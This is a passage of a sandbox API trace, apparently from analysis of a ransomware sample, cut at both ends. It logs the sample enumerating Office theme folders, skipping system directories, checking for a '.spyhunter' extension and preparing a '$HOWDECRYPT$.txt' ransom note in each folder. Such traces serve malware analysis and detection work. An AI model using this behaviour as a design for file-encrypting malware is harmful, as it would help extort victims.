(lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.946] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 78 [0090.946] GetProcessHeap () returned 0x2c0000 [0090.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377170 [0090.946] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1380) returned 0x3824f8 [0090.946] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.946] lstrcmpiW (lpString1="SPRING.ELM", lpString2="Windows") returned -1 [0090.946] lstrlenW (lpString="Windows") returned 7 [0090.946] lstrcmpiW (lpString1="SPRING.ELM", lpString2="$Recycle.bin") returned 1 [0090.947] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.947] lstrcmpiW (lpString1="SPRING.ELM", lpString2="System Volume Information") returned -1 [0090.947] lstrlenW (lpString="System Volume Information") returned 25 [0090.947] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM") returned 77 [0090.947] StrStrIW (lpFirst="SPRING.ELM", lpSrch=".spyhunter") returned 0x0 [0090.947] lstrcmpW (lpString1="SPRING.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.947] lstrcmpW (lpString1="SPRING.ELM", lpString2="_uninstalling_.png") returned 1 [0090.947] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM") returned 77 [0090.947] GetProcessHeap () returned 0x2c0000 [0090.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377258 [0090.947] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1388) returned 0x3824f8 [0090.947] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.947] lstrcmpiW (lpString1="SPRING.INF", lpString2="Windows") returned -1 [0090.947] lstrlenW (lpString="Windows") returned 7 [0090.947] lstrcmpiW (lpString1="SPRING.INF", lpString2="$Recycle.bin") returned 1 [0090.947] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.947] lstrcmpiW (lpString1="SPRING.INF", lpString2="System Volume Information") returned -1 [0090.947] lstrlenW (lpString="System Volume Information") returned 25 [0090.947] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF") returned 77 [0090.947] StrStrIW (lpFirst="SPRING.INF", lpSrch=".spyhunter") returned 0x0 [0090.947] lstrcmpW (lpString1="SPRING.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.947] lstrcmpW (lpString1="SPRING.INF", lpString2="_uninstalling_.png") returned 1 [0090.947] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF") returned 77 [0090.947] GetProcessHeap () returned 0x2c0000 [0090.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377340 [0090.947] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1390) returned 0x3824f8 [0090.948] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.948] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.948] lstrlenW (lpString="Windows") returned 7 [0090.948] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.948] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.948] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.948] lstrlenW (lpString="System Volume Information") returned 25 [0090.948] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 79 [0090.948] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.948] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.948] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.948] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 79 [0090.948] GetProcessHeap () returned 0x2c0000 [0090.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377428 [0090.948] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1398) returned 0x3824f8 [0090.948] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.948] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.948] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\$HOWDECRYPT$.txt") returned 83 [0090.948] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\$HOWDECRYPT$.txt") returned 83 [0090.948] GetProcessHeap () returned 0x2c0000 [0090.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x3412d0 [0090.949] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13a0) returned 0x3824f8 [0090.949] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.949] lstrcmpiW (lpString1="STRTEDGE", lpString2="Windows") returned -1 [0090.949] lstrlenW (lpString="Windows") returned 7 [0090.949] lstrcmpiW (lpString1="STRTEDGE", lpString2="$Recycle.bin") returned 1 [0090.949] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.949] lstrcmpiW (lpString1="STRTEDGE", lpString2="System Volume Information") returned -1 [0090.949] lstrlenW (lpString="System Volume Information") returned 25 [0090.949] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE") returned 68 [0090.949] lstrcmpW (lpString1="STRTEDGE", lpString2=".") returned 1 [0090.949] lstrcmpW (lpString1="STRTEDGE", lpString2="..") returned 1 [0090.949] GetProcessHeap () returned 0x2c0000 [0090.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.949] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*") returned 70 [0090.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.982] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.982] lstrlenW (lpString="Windows") returned 7 [0090.982] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.982] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.982] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.982] lstrlenW (lpString="System Volume Information") returned 25 [0090.982] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\.") returned 70 [0090.982] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.982] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.983] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.983] lstrlenW (lpString="Windows") returned 7 [0090.983] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.983] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.983] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.983] lstrlenW (lpString="System Volume Information") returned 25 [0090.983] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\..") returned 71 [0090.983] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.983] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.983] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.983] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.983] lstrlenW (lpString="Windows") returned 7 [0090.983] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.983] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.983] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.983] lstrlenW (lpString="System Volume Information") returned 25 [0090.983] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 80 [0090.983] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.983] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.983] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.983] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 80 [0090.983] GetProcessHeap () returned 0x2c0000 [0090.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x3412d0 [0090.983] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1380) returned 0x3824f8 [0090.984] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.984] lstrcmpiW (lpString1="STRTEDGE.ELM", lpString2="Windows") returned -1 [0090.984] lstrlenW (lpString="Windows") returned 7 [0090.984] lstrcmpiW (lpString1="STRTEDGE.ELM", lpString2="$Recycle.bin") returned 1 [0090.984] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.984] lstrcmpiW (lpString1="STRTEDGE.ELM", lpString2="System Volume Information") returned -1 [0090.984] lstrlenW (lpString="System Volume Information") returned 25 [0090.984] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM") returned 81 [0090.984] StrStrIW (lpFirst="STRTEDGE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.984] lstrcmpW (lpString1="STRTEDGE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.984] lstrcmpW (lpString1="STRTEDGE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.984] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM") returned 81 [0090.984] GetProcessHeap () returned 0x2c0000 [0090.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3414b0 [0090.984] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1388) returned 0x3824f8 [0090.984] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.984] lstrcmpiW (lpString1="STRTEDGE.INF", lpString2="Windows") returned -1 [0090.984] lstrlenW (lpString="Windows") returned 7 [0090.984] lstrcmpiW (lpString1="STRTEDGE.INF", lpString2="$Recycle.bin") returned 1 [0090.984] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.984] lstrcmpiW (lpString1="STRTEDGE.INF", lpString2="System Volume Information") returned -1 [0090.984] lstrlenW (lpString="System Volume Information") returned 25 [0090.984] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF") returned 81 [0090.984] StrStrIW (lpFirst="STRTEDGE.INF", lpSrch=".spyhunter") returned 0x0 [0090.985] lstrcmpW (lpString1="STRTEDGE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.985] lstrcmpW (lpString1="STRTEDGE.INF", lpString2="_uninstalling_.png") returned 1 [0090.985] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF") returned 81 [0090.985] GetProcessHeap () returned 0x2c0000 [0090.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3422c0 [0090.999] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1388) returned 0x3824f8 [0090.999] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.999] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.999] lstrlenW (lpString="Windows") returned 7 [0090.999] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.999] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.999] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.999] lstrlenW (lpString="System Volume Information") returned 25 [0090.999] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 81 [0090.999] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.999] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.999] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.999] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 81 [0090.999] GetProcessHeap () returned 0x2c0000 [0090.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3423b0 [0090.999] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1390) returned 0x3824f8 [0090.999] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.999] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.000] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\$HOWDECRYPT$.txt") returned 85 [0091.000] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\$HOWDECRYPT$.txt") returned 85 [0091.000] GetProcessHeap () returned 0x2c0000 [0091.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3551c0 [0091.000] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1398) returned 0x3824f8 [0091.001] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.001] lstrcmpiW (lpString1="STUDIO", lpString2="Windows") returned -1 [0091.001] lstrlenW (lpString="Windows") returned 7 [0091.001] lstrcmpiW (lpString1="STUDIO", lpString2="$Recycle.bin") returned 1 [0091.001] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.001] lstrcmpiW (lpString1="STUDIO", lpString2="System Volume Information") returned -1 [0091.001] lstrlenW (lpString="System Volume Information") returned 25 [0091.001] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO") returned 66 [0091.001] lstrcmpW (lpString1="STUDIO", lpString2=".") returned 1 [0091.001] lstrcmpW (lpString1="STUDIO", lpString2="..") returned 1 [0091.001] GetProcessHeap () returned 0x2c0000 [0091.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.002] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*") returned 68 [0091.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.002] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.002] lstrlenW (lpString="Windows") returned 7 [0091.002] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.002] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.002] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.002] lstrlenW (lpString="System Volume Information") returned 25 [0091.002] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\.") returned 68 [0091.002] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.002] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.002] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.003] lstrlenW (lpString="Windows") returned 7 [0091.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.003] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.003] lstrlenW (lpString="System Volume Information") returned 25 [0091.003] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\..") returned 69 [0091.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.003] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.003] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0091.003] lstrlenW (lpString="Windows") returned 7 [0091.003] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0091.003] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.003] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0091.003] lstrlenW (lpString="System Volume Information") returned 25 [0091.003] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 78 [0091.003] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0091.003] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.003] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0091.003] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 78 [0091.003] GetProcessHeap () returned 0x2c0000 [0091.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377170 [0091.003] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13a0) returned 0x3824f8 [0091.003] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.003] lstrcmpiW (lpString1="STUDIO.ELM", lpString2="Windows") returned -1 [0091.004] lstrlenW (lpString="Windows") returned 7 [0091.004] lstrcmpiW (lpString1="STUDIO.ELM", lpString2="$Recycle.bin") returned 1 [0091.004] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.004] lstrcmpiW (lpString1="STUDIO.ELM", lpString2="System Volume Information") returned -1 [0091.004] lstrlenW (lpString="System Volume Information") returned 25 [0091.004] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM") returned 77 [0091.004] StrStrIW (lpFirst="STUDIO.ELM", lpSrch=".spyhunter") returned 0x0 [0091.004] lstrcmpW (lpString1="STUDIO.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.004] lstrcmpW (lpString1="STUDIO.ELM", lpString2="_uninstalling_.png") returned 1 [0091.004] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM") returned 77 [0091.004] GetProcessHeap () returned 0x2c0000 [0091.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377258 [0091.004] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13a8) returned 0x3824f8 [0091.004] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.004] lstrcmpiW (lpString1="STUDIO.INF", lpString2="Windows") returned -1 [0091.004] lstrlenW (lpString="Windows") returned 7 [0091.004] lstrcmpiW (lpString1="STUDIO.INF", lpString2="$Recycle.bin") returned 1 [0091.004] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.004] lstrcmpiW (lpString1="STUDIO.INF", lpString2="System Volume Information") returned -1 [0091.004] lstrlenW (lpString="System Volume Information") returned 25 [0091.004] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF") returned 77 [0091.004] StrStrIW (lpFirst="STUDIO.INF", lpSrch=".spyhunter") returned 0x0 [0091.004] lstrcmpW (lpString1="STUDIO.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.004] lstrcmpW (lpString1="STUDIO.INF", lpString2="_uninstalling_.png") returned 1 [0091.004] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF") returned 77 [0091.004] GetProcessHeap () returned 0x2c0000 [0091.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377340 [0091.005] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13b0) returned 0x3824f8 [0091.005] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.005] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0091.005] lstrlenW (lpString="Windows") returned 7 [0091.005] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0091.005] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.005] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0091.005] lstrlenW (lpString="System Volume Information") returned 25 [0091.005] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 79 [0091.005] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0091.005] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.005] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0091.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 79 [0091.005] GetProcessHeap () returned 0x2c0000 [0091.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x376ce8 [0091.005] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13b8) returned 0x3824f8 [0091.005] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.005] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.005] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\$HOWDECRYPT$.txt") returned 83 [0091.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\$HOWDECRYPT$.txt") returned 83 [0091.006] GetProcessHeap () returned 0x2c0000 [0091.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x3424a0 [0091.006] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x13c0) returned 0x3824f8 [0091.006] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.006] lstrcmpiW (lpString1="SUMIPNTG", lpString2="Windows") returned -1 [0091.006] lstrlenW (lpString="Windows") returned 7 [0091.006] lstrcmpiW (lpString1="SUMIPNTG", lpString2="$Recycle.bin") returned 1 [0091.006] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.006] lstrcmpiW (lpString1="SUMIPNTG", lpString2="System Volume Information") returned -1 [0091.006] lstrlenW (lpString="System Volume Information") returned 25 [0091.006] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG") returned 68 [0091.006] lstrcmpW (lpString1="SUMIPNTG", lpString2=".") returned 1 [0091.006] lstrcmpW (lpString1="SUMIPNTG", lpString2="..") returned 1 [0091.006] GetProcessHeap () returned 0x2c0000 [0091.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.006] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*") returned 70 [0091.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.008] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.008] lstrlenW (lpString="Windows") returned 7 [0091.008] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.008] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.008] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.008] lstrlenW (lpString="System Volume Information") returned 25 [0091.008] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\.") returned 70 [0091.008] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.008] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.008] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.008] lstrlenW (lpString="Windows") returned 7 [0091.008] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.008] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.008] 